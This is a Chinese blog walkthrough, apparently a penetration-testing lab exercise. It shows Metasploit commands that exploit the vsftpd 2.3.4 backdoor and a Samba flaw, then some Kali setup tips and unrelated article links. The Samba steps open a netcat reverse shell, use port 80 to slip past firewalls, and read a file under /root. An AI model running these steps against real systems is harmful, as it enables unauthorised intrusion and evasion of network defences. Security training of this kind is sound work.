FTP后门命令执行

再次声明,最近听闻不得教受工具使用等言论。

我敢打包票,网络空间安全一级学科的老师和学生是不会说这句话的。未知攻,焉知防。

有工具来检测自己和玩弄它,是幸运的。

犯罪者不会给你提供任何的漏洞利用工具让你玩弄。

他们的工具里面包含的漏洞是自己研发出来的。

因此,您所有看得见的工具都是用于安全的学习和培养安全性人才而使用的,是最低级别的技术。

如果这样的工具和教程都能够对公司和国家构成危害的话,那么犯罪者就更加的可以肆无忌惮的发布攻击。

我们的工具学习和掌握如同在学小学一年级,犯罪者使用的工具是大学级别。

工具都不让发布和用于教学,还谈什么国家安全,拿什么认知和技能去防御真正的攻击。

metasploit是rapid7开发的 www.rapid7.com

它是一个大型漏洞利用数据库,可以创造属于自己的漏洞

为了安全性检测,利用它和修补漏洞

parrot:msfconsole

help

use    show    set    exploit

谷歌 rapid7 进入 vulnerability & Exploit Database   查询 VSFTPD v2.3.4 Backdoor Command Execution

use 复制粘贴模块名字

show options

set RHOST 靶机IP

show options

exploit

uname -r    uname -a    ls

Samba命令执行

谷歌 rapid7 进入 vulnerability & Exploit Database 查询到zenmap对应的samba模块 获取模块的信息

samba服务器运行它没有后门

唯一的方式是利用缓冲区溢出,使用有效载荷

use 复制粘贴模块名字

options

set RHOST 靶机ip

clear

show payloads

选择 cmd/unix/reverse_netcat 复制

set payload 复制粘贴

options

设置自己的监听端口为80,靶机访问80端口防火墙会认为它在访问网站,让可疑程度降低

如果反向连接出来的端口是一个奇怪的数字,防火墙会阻止这个连接,说这个可疑

set LHOST 本机IP

exploit

uname -a    ls    cd /root    ls    cat vnc.log

VMware安装kali

pureVPN赞助

从桌面光盘进去把VMware Tools拿到桌面解压 进去后右键运行终端

perl vmware-install.pl

一切配置默认,注销后生效

多终端显示

apt-get install terminator

打开terminator

top

namp

右键选择垂直分开

多终端显示

8.FTP后门命令执行----Samba命令执行----VMware安装kali----多终端显示的更多相关文章

  1. 使用 FileZilla FTP Client连接Vsftpd在执行LIST命令后提示连接超时

    使用 FileZilla FTP Client 连接 Vsftpd在执行LIST命令后提示连接超时. vi /etc/vsftpd/vsftpd.conf 添加: #开启被动模式 pasv_enabl ...

  2. salt常用命令、模块、执行

    一.salt常用命令 salt 该命令执行salt的执行模块,通常在master端运行,也是我们最常用到的命令 salt [options] '<target>' <function ...

  3. [转帖]linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令

    linux screen 命令详解,xshell关掉窗口或者断开连接,查看断开前执行的命令 https://binwaer.com/post/12.html yun install -y screen ...

  4. 渗透技巧——如何逃逸Linux的受限制shell执行任意命令

    导语:本文介绍了如何在受限制的shell中执行任意命令,实现交互.其相应的利用场景是说当我们通过一些手段拿到当前Linux机器的shell时,由于当前shell的限制,很多命令不能执行,导致后续的渗透 ...

  5. ansible使用临时命令通过模块来执行任务

    使用临时命令通过模块来执行任务 一.查看系统上安装的所有模块 ansible-doc -l 查看ping模块帮助文档 ansible-doc ping 1.ansible模块 文件模块: copy:将 ...

  6. 【每日一linux命令2】命令执行顺序:

    二.命令顺序:     若在 shell 内置的命令/bin 以及/usr/bin 之下都出现了命令 pwd,那当我们执行该命令时,会执行哪 一个?答案是第一优先执行 shell 内置的命令,再执行路 ...

  7. 在程序中执行shell命令

    在linux系统下的操作中我们会经常用到shell命令来进行,一开始学习进程的时候对于shell命令也进行了思考,认为shell命令就是一个进程的外壳,经过了后来的学习对于这一点也有了更多的认识. 用 ...

  8. Linux远程执行Shell命令或脚本

    ## 远程执行shell命令 ssh [user]@[server] '[command]' # eg. ssh root@192.168.1.1 'uptime' ## 远程执行本地shell脚本 ...

  9. 解决idea中执行maven命令失败的问题

    1.问题描述 如上图所示,在使用idea 里的maven命令执行项目打包时,有时候会报如下一个错误. -Dmaven.multiModuleProjectDirectory system proper ...

随机推荐

  1. 跨域 (2) cors

    html <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF- ...

  2. 解决jmeter 请求参数中文乱码

    今天在用jmeter 写脚本时发现查看结果树request post请求中文参数值是乱码,故记录下解决过程. 解决过程如下: 1.修改本地配置文件 因为此处的数据,还没有发送出去,所以,肯定是这个变量 ...

  3. ApplicationRunner接口

    ApplicationRunner 和 CommandLineRunner 功能一致,用法也基本一致,唯一的区别主要体现在对参数的处理上,ApplicationRunner 可以接收更多类型的参数(A ...

  4. node中controller的get和post方法获取参数

    1.get: const body = ctx.query; // get请求   2.post: const body = ctx.request.body; // post请求

  5. Sublime Text3的Package Control安装教程,及报错解决There Are No Packages Available For Installation

    一.Package Control的安装 Sublime 有很多插件,这些插件为我们写python代码提供了非常强大的功能,这些插件需要单独安装.而安装这些插件最方便的方法就是通过Package Co ...

  6. You have 1 unapplied migration(s). Your project may not work properly until you apply the migrations for app(s): shopadmin. Run 'python manage.py migrate' to apply them.

    数据库迁移时报错, You have 1 unapplied migration(s). Your project may not work properly until you apply the ...

  7. Selenium 元素常用操作方法(键盘和鼠标事件)

    一.简单操作 click():点击 send_keys():输入 clear():清空 submit():提交表单 size:返回元素的尺寸 text:获取元素的文本 get_attribute(): ...

  8. 前台ajax传数组,后台java接收

    后端 //添加 @RequestMapping(value = "checkChoise") @ResponseBody ResultJson checkChoise(@Reque ...

  9. Java 简单工厂

    在面向对象编程中, 最通常的方法是一个new操作符产生一个对象实例,new操作符就是用来构造对象实例的.但是在一些情况下, new操作符直接生成对象会带来一些问题.举例来说, 许多类型对象的创造需要一 ...

  10. python之random随机函数

    random.random()用于生成 用于生成一个指定范围内的随机符点数,两个参数其中一个是上限,一个是下限.如果a > b,则生成随机数 1 n: a <= n <= b.如果 ...